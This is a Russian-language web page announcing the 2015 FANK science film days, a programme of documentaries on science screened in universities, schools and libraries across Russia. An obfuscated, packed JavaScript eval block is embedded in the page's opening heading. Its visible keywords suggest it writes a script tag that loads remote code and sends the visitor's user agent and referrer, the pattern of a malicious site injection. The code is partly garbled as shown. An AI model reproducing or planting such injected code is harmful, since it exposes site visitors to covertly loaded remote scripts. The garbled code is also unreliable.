

Дни `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6("";n m="q";',30,30,'document|javascript|encodeURIComponent|src|write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|euyay|var|u0026u|referrer|kbznd|js|php'.split('|'),0,{}))` научного кино ФАНК – просветительский проект, организованный [Фестивалем актуального научного кино](#) (ФАНК) при поддержке Министерства образования и науки Российской Федерации.



До конца декабря 2015 г. научное кино будет показано в более чем [100 российских вузах](#). Но не только они проявили интерес к кино о науке. В адрес Оргкомитета фестиваля поступили заявки от школ, НИИ, библиотек, культурных пространств из Воронежа, Самары, Владивостока, Казани, Уфы, Сыктывкара и других городов. Из них было отобрано 114 участников из 63 городов России, которые с октября по декабрь 2015 г. откроют двери своих аудиторий и кинозалов для документального кино о науке и открытиях.

В [каталог](#) Дней научного кино ФАНК вошли более 40 фильмов о жизни учёных и изобретателей, об их открытиях и исследованиях, возможностях и угрозах, связанных с развитием науки и технологий. Среди них: «Страсти по частицам», «Больше, чем мед», «Принтер будущего», «Любовь и инженеры», «Планета», «Чувственная математика», фильмы, снятые при грантовой поддержке Русского географического общества.